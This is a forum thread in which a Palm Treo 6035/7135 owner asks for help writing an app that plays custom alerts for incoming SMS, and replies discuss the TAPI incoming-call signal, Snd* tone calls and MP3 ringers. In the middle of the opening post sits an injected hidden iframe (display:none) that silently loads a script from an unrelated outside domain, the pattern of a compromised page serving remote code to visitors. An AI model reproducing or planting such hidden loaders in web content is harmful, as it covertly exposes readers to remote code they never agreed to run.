+ Reply to Thread

app for custom alerts and SMS

ever since I got my 6035, I've wanted to be able to have a different alert for incoming text messages.

I've seen the question posted many times here - asking if the phone can do this. No it can not.

but, I am determined to make this work.

At first, I thought about trying to modify the existing 'Messages' app that comes with the phone. Then I thought about trying to make an entirely new 'Messages' app to replace the original.

But now I realize, all of that is not necessary. All that (should) be needed is an additional app that monitors incoming messages (text, vmail, pager) and then play an alert/ringer that the user picks.

And, one good advantage to this would be this app would then work with both the 6035 and the 7135!

So, I am looking for any programmers out there that:

a) want to assist me in writing this code
    b) want to write it themselves
    c) are just bored and want to flame me <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

As for playing a specific ringer I'm not at all sure how that would work or even if possible. But you could certainly play a different alert tone. You only need to see BigClock or similar apps to know that you CAN do a lot with basic tones. I assume the ringer PDBs just contain sequences of tone data as a resource record, but I've never seen the format.

Now for catching the message, I'm assuming you've already seen the API that lays out where that happens? Looks like the SGN_CLASS_TAPI signal class, SGN_TAPI_INCOMING signal, CT_SMS call type. I don't see any example code for it, and am a little fuzzy on what you mean by modifying the existing app. Unless you have the code, you'd have to do something separate.

Are you planning on trying this yourself? Programmed for Palm before?

ACtually, the ringers in teh 7135 are MP3's just like the ones you can make. It's uses the MP3 Player resources to play them on incoming calls.

Yes this would certainly be the easiest and most flexible route to go for a 7135 solution, and it's plainly documented in the API reference. falconvp, perhaps the strategy if you want an app that works on both 6035 and 7135 would be to stick to regular tones or alarms via the Snd* PalmOS API calls for the 6035 and play MP3s on the 7135.

Originally posted by HoTSynC
    ACtually, the ringers in teh 7135 are MP3's just like the ones you can make. It's uses the MP3 Player resources to play them on incoming calls.